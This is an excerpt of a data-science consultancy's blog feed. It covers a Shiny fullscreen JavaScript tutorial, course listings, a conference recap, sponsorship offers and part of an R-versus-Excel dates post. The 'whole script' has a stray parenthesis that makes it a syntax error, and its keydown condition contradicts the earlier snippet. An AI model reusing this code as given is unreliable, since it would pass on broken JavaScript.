&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt;(code &lt;span style="color:#ff7b72;font-weight:bold"&gt;!==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Enter&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;isFullscreen()) { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; focus &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; document.activeElement;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; ($plotContainers.toArray().includes(focus)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; focus.requestFullscreen();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first line inside the event handler checks which key has been pressed. If that key is &amp;ldquo;Enter&amp;rdquo; and we&amp;rsquo;re not already in fullscreen we check which element currently has focus. If that element is one of our plot containers we make it fullscreen.&lt;/p&gt;
&lt;h2 id="the-whole-javascript-script"&gt;The whole JavaScript script&lt;/h2&gt;
&lt;p&gt;For convenience and clarity, here&amp;rsquo;s the full fullscreen.js script, with comments added:&lt;/p&gt;
&lt;details open&gt; &lt;summary&gt;www/fullscreen.js&lt;/summary&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-js" data-lang="js"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;$(&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; () {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;use strict&amp;#39;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// If fullscreen is not supported jump right out
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (&lt;span style="color:#ff7b72;font-weight:bold"&gt;!&lt;/span&gt;document.fullscreenEnabled)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Simple helper to return a Boolean indicating whether
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// already in fullscreen mode
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; isFullscreen() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;!!&lt;/span&gt;document.fullscreenElement;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Get all the plot containers
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; $plotContainers &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; $(&lt;span style="color:#a5d6ff"&gt;&amp;#39;.plot-container&amp;#39;&lt;/span&gt;);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Make plots go fullscreen when double-clicked
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; $plotContainers.on(&lt;span style="color:#a5d6ff"&gt;&amp;#39;dblclick&amp;#39;&lt;/span&gt;, &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; () {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (isFullscreen()) { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;this&lt;/span&gt;.requestFullscreen();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Add keyboard controls
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; $(document).on(&lt;span style="color:#a5d6ff"&gt;&amp;#39;keydown&amp;#39;&lt;/span&gt;, &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt; (event) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Get name of key pressed
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; code &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; event.originalEvent.code;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// If the user presses something other than Enter or
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// we&amp;#39;re already in fullscreen we can jump staight out...
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (code &lt;span style="color:#ff7b72;font-weight:bold"&gt;!==&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#39;Enter&amp;#39;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;||&lt;/span&gt; isFullscreen()) { &lt;span style="color:#ff7b72"&gt;return&lt;/span&gt;; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// Find the element that currently has focus
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;const&lt;/span&gt; focus &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; document.activeElement;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// If that element is one of our plots...
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; ($plotContainers.toArray().includes(focus)) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;// ...make it fullscreen
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;&lt;/span&gt; focus.requestFullscreen();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; });
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;});
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/details&gt;
&lt;h2 id="quick-notes-on-accessibility"&gt;Quick notes on accessibility&lt;/h2&gt;
&lt;p&gt;While we&amp;rsquo;ve added both mouse and keyboard controls for entering fullscreen, you only know how they work &amp;mdash; and that they exist at all &amp;mdash; because I&amp;rsquo;ve outlined them in this article! That is, to keep things simple I&amp;rsquo;ve omitted instructions in the actual app. In the real world, how fullscreen can be entered should be made clear to all users of the app, not just those who&amp;rsquo;ve read an accompanying blog post.&lt;/p&gt;
&lt;p&gt;For similar reasons, I&amp;rsquo;ve omitted alt text from the charts, which is also bad for accessibility. You should see our earlier blog post on &lt;a href="https://www.jumpingrivers.com/blog/accessibility-alt-text-in-r/" rel="external"&gt;&amp;ldquo;Alt Text in R: Plots, Reports, and Shiny&amp;rdquo;&lt;/a&gt; for advice on how to do alt text well.&lt;/p&gt;
&lt;p&gt;Finally, the items being made fullscreen here are graphics. But any element can be made fullscreen in browsers that support the API. That includes elements containing descendant focusable elements. In that case be sure to check the behaviour of these elements isn&amp;rsquo;t adversly affected by the change and ensure they are still accessible to both mouse and keyboard users.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/fullscreen-r-shiny-javascript-api/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>June Training Update</title><link>https://www.jumpingrivers.com/blog/june-training-update-r-ggplot-dplyr-statistical-modelling/</link><pubDate>Tue, 06 Jun 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/june-training-update-r-ggplot-dplyr-statistical-modelling/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/june-training-update-r-ggplot-dplyr-statistical-modelling/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/june-training-update-r-ggplot-dplyr-statistical-modelling/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This summer, we have public courses to take you all the way from the very basics of R, through to using R for statistical modelling, with some data wrangling and intermediate programming in between. Wherever you are on your R journey, take a look at our &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;upcoming courses&lt;/a&gt; to see if we can help you on your way.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-june-training-update-r-ggplot-dplyr-statistical-modelling"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;!-- This is where the ad goes! Just use the name of the shortcode file. --&gt;&lt;/p&gt;
&lt;h3 id="introduction-to-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 26th June 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;R is a versatile language for statistical computing and graphics. In &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;this course&lt;/a&gt; you will learn the advantages of using R and how to get started. You will gain familiarity with the RStudio interface and learn the R basics. Also included is an introduction to the Tidyverse and how to use various packages for data storage, visualisation and manipulation. This course provides a great foundation to begin your R journey!&lt;/p&gt;
&lt;h3 id="data-wrangling-in-the-tidyverse"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;Data Wrangling in the Tidyverse&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 3rd July 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;If you work with data, you probably spend a lot of time cleaning it and wrangling it into the correct shape. &lt;a href="https://www.jumpingrivers.com/training/course/data-tidyverse-dplyr-tidyr-lubridate-forcats/" rel="external"&gt;This course&lt;/a&gt; will show you how you can use R to efficiently clean and wrangle your data into a format that’s ready for analysis. You will learn about the Tidyverse, what tidy data really is, and how to practically achieve it with packages such as {dplyr}, {tidyr}, {lubridate} and {forcats}.&lt;/p&gt;
&lt;h3 id="programming-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;Programming with R&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 10th July 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The benefit of using a programming language such as R is that we can automate repetitive tasks. &lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental techniques such as functions, for loops and conditional expressions. By the end of this course, you will understand what these techniques are and when to use them. This is a one-day intensive course on R.&lt;/p&gt;
&lt;h3 id="statistical-modelling-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;Statistical Modelling with R&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 17th July 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;From the very beginning, R was designed for statistical modelling. Out of the box, R makes standard statistical techniques easy. &lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental modelling techniques. We begin the day by revising hypotheses tests, before moving onto ANOVA tables and regression analysis. The class ends by looking at more sophisticated methods such as clustering and principal components analysis (PCA).&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/june-training-update-r-ggplot-dplyr-statistical-modelling/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2022: A recap</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2022-conference-recap/</link><pubDate>Thu, 25 May 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2022-conference-recap/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2022-conference-recap/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2022-conference-recap/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;With the planning for this year&amp;rsquo;s Shiny in Production conference well under way, we thought now was a good time for a little recap of what happened last year.&lt;/p&gt;
&lt;h3 id="day-one-workshops"&gt;Day One: Workshops&lt;/h3&gt;
&lt;p&gt;The first day of the conference consisted of three of workshops delivered by our very own JR trainers.&lt;/p&gt;
&lt;p&gt;The most popular workshop of the day was Introduction to RStudio (now Posit) Connect, which we will be running again in the 2023 conference. This workshop demonstrated a few different workflows to allow you to host, share and scale content such as APIs, Shiny applications and R Markdown documents with RStudio Connect.&lt;/p&gt;
&lt;p&gt;We also ran a workshop on an Introduction to Tableau, demonstrating the basics of using this software to summarise and interactively visualise data. If you&amp;rsquo;re interested in learning more about Tableau, take a look at our Tableau courses, &lt;a href="https://www.jumpingrivers.com/training/course/introduction-to-tableau/" rel="external"&gt;Introduction to Tableau&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/data-exploration-with-tableau/" rel="external"&gt;Data Exploration with Tableau&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Last but certainly not least, we ran a workshop on Automated Reporting with Quarto. Quarto is a brand new open source publishing system that allows you to dynamically create static or interactive documents and automatically update reports when data changes. This workshop demonstrated how to make a range of outputs, from simple documents to presentations and dashboards. If you&amp;rsquo;re interested in learning more about Quarto, we have a &lt;a href="https://www.jumpingrivers.com/training/course/reporting-with-quarto/" rel="external"&gt;Reporting with Quarto&lt;/a&gt; course, which you might want to check out.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-shiny-in-production-2022-conference-recap"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="day-two-talks"&gt;Day Two: Talks&lt;/h3&gt;
&lt;p&gt;Last year&amp;rsquo;s speakers set the bar high for our first conference, and we&amp;rsquo;re excited to see what this year&amp;rsquo;s speakers bring to the table! For a full rundown of the talks, take a look at the &lt;a href="https://www.jumpingrivers.com/blog/shiny-in-production-highlights/" rel="external"&gt;highlights blog&lt;/a&gt;, which was put together by some of our JR data scientists who were in attendance.&lt;/p&gt;
&lt;p&gt;If it&amp;rsquo;s more than just highlights that you&amp;rsquo;re after, we have a &lt;a href="https://www.youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD" rel="external"&gt;playlist of talk recordings&lt;/a&gt; on our YouTube channel.&lt;/p&gt;
&lt;p&gt;If this has whet your appetite, our Early Bird tickets are now available! If you want to take an even more active role in the conference, we&amp;rsquo;re now accepting abstracts. All of the details are on our &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;conference website&lt;/a&gt;, so head over there to sign up!&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2022-conference-recap/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Conference and useR Group Sponsorship Opportunities</title><link>https://www.jumpingrivers.com/blog/conference-and-user-groups-rladies-sponsorship/</link><pubDate>Tue, 23 May 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/conference-and-user-groups-rladies-sponsorship/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/conference-and-user-groups-rladies-sponsorship/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/conference-and-user-groups-rladies-sponsorship/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Here at Jumping Rivers, we love data science. One of the huge benefits of data science is transparency. For example, R. Being an open-source language, it immediately is giving something back to the community that propels it to the top of the data science ladder. Just like the world of data science, our ethos is transparency and giving back to the community.&lt;/p&gt;
&lt;h3 id="conference-sponsorship"&gt;Conference sponsorship&lt;/h3&gt;
&lt;p&gt;To help support the community, we are offering automatic sponsorship of any R conference. All the organisers need to do is complete a quick &lt;a href="https://www.jumpingrivers.com/q/sponsorship/" rel="external"&gt;questionnaire&lt;/a&gt; and the money is sent on it&amp;rsquo;s way. We have sponsored several events in the past, which can be found on the community page of our website. We have also sponsored several SatRdays events over the last few years, including&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://kampala2019.satrdays.org/" rel="external"&gt;Kampala 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://newcastle2019.satrdays.org" rel="external"&gt;Newcastle 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://nairobi2019.satrdays.org/" rel="external"&gt;Nairobi 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cardiff2019.satrdays.org" rel="external"&gt;Cardiff 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://berlin2019.satrdays.org/" rel="external"&gt;Berlin 2019&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://abidjan2020.satrdays.org/" rel="external"&gt;Abidjan 2020&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://newcastle2020.satrdays.org" rel="external"&gt;Newcastle 2020&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;London 2023&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So if you are organising an R conference, feel free to tap us for &lt;a href="https://www.jumpingrivers.com/q/sponsorship/" rel="external"&gt;sponsorship&lt;/a&gt;! We&amp;rsquo;re particularly proud of how frictionless we&amp;rsquo;ve made the process.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-conference-and-user-groups-rladies-sponsorship"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="user--r-ladies-groups"&gt;useR / R-Ladies Groups&lt;/h3&gt;
&lt;p&gt;We also offer sponsorship for useR and R-Ladies groups in Europe! We currently sponsor:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/" rel="external"&gt;North East Data Scientists (NEDS) Meetup&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.meetup.com/leeds-data-science-meetup/" rel="external"&gt;Leeds Data Science Meetup&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.meetup.com/warwickrug/" rel="external"&gt;Warwick R User Group&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;So if you want sponsorship for your group, just complete this &lt;a href="https://www.jumpingrivers.com/q/sponsorship/" rel="external"&gt;quick form&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/conference-and-user-groups-rladies-sponsorship/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Why should I use R: Handling Dates in R and Excel: Part 3</title><link>https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/</link><pubDate>Thu, 18 May 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/date-r-excel-datetimes-transition/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part 3 of an ongoing series on why you should use R. Future
blogs will be linked here as they are released.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/comparing-r-excel-data-wrangling/" rel="external"&gt;Why should I use R: The Excel R Data Wrangling comparison:
Part
1&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/why-create-plots-in-r-part-2/" rel="external"&gt;Why should I use R: The Excel R plotting comparison: Part
2&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: Why should I use R: Handling Dates in R and Excel: Part 3
(This post)&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="dates-in-excel"&gt;Dates in Excel&lt;/h3&gt;
&lt;p&gt;Here we will explore the various ways to handle dates in Excel and R.
Dates are a crucial part of data analysis and are used in various fields
such as biology, healthcare, and social sciences. However, working with
dates can be challenging, especially when dealing with large datasets or
multiple formats.&lt;/p&gt;
&lt;p&gt;In Excel, there are several functions available to handle dates, such as
&lt;code&gt;DATE&lt;/code&gt;, &lt;code&gt;YEAR&lt;/code&gt;, &lt;code&gt;MONTH&lt;/code&gt;, and &lt;code&gt;DAY&lt;/code&gt;. Excel also provides various
formatting options to customise the display of dates. However, Excel has
some limitations when it comes to complex date calculations, and it can
be time-consuming to work with dates in large datasets.&lt;/p&gt;
&lt;p&gt;In contrast, R has a robust set of tools for handling dates, including
the &lt;a href="https://lubridate.tidyverse.org/" rel="external"&gt;{lubridate}&lt;/a&gt; package, which
simplifies the manipulation of dates and times. Additionally, R allows
for efficient handling of dates in large datasets, making it a powerful
tool for time-series analysis. Whether you are working with dates in
Excel or R, this blog will provide you with the basic tools and
techniques to handle dates efficiently and accurately. So let’s get
started!&lt;/p&gt;
&lt;h3 id="handling-dates-using-lubridate"&gt;Handling dates using {lubridate}&lt;/h3&gt;
&lt;p&gt;The {lubridate} package provides a range of functions that simplify
common tasks. {lubridate} makes working with dates and times more
intuitive and less error-prone, allowing users to focus on their
analysis rather than the difficulties of date manipulation.&lt;/p&gt;
&lt;p&gt;The {lubridate} package provides:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;User-friendly syntax: consistent and intuitive syntax which makes it
easier to understand and write code for date operations.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Comprehensive functionality: Offers a range of built in functions for
common date operations. It allows us to parse dates from different
formats and extract information such as year, month and day. This
functionality saves time and effort compared to your manual
calculations in Excel.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Date representation: {lubridate} ensures consistent date
representation by using the POSIXct class, which stores dates as
numbers of seconds since 1 January 1970.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-date-r-excel-datetimes-transition"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="converting-dates"&gt;Converting dates:&lt;/h3&gt;
&lt;p&gt;In Excel, to convert a string into a date format, you can use the
&lt;code&gt;DATEVALUE()&lt;/code&gt; function. For example, if your date is in cell &lt;code&gt;A2&lt;/code&gt;, you
can use &lt;code&gt;=DATEVALUE(A2)&lt;/code&gt; to convert it into a date format. In R, you can
use the &lt;code&gt;as_date()&lt;/code&gt; function to convert a string into a date format. For
example, if your date is &lt;code&gt;&amp;quot;2023-01-18&amp;quot;&lt;/code&gt;, you can use
&lt;code&gt;as_date(&amp;quot;2023-01-18&amp;quot;)&lt;/code&gt;.&lt;/p&gt;
&lt;h4 id="r"&gt;R&lt;/h4&gt;
&lt;p&gt;In R, when running the class function on &lt;code&gt;as_date(&amp;quot;2023-01-18&amp;quot;)&lt;/code&gt;, it
returns the class or data type of the object. In this case, it would
return “Date” since &lt;code&gt;as-date(&amp;quot;2023-01-18&amp;quot;)&lt;/code&gt; converts the given string
into a date object.&lt;/p&gt;
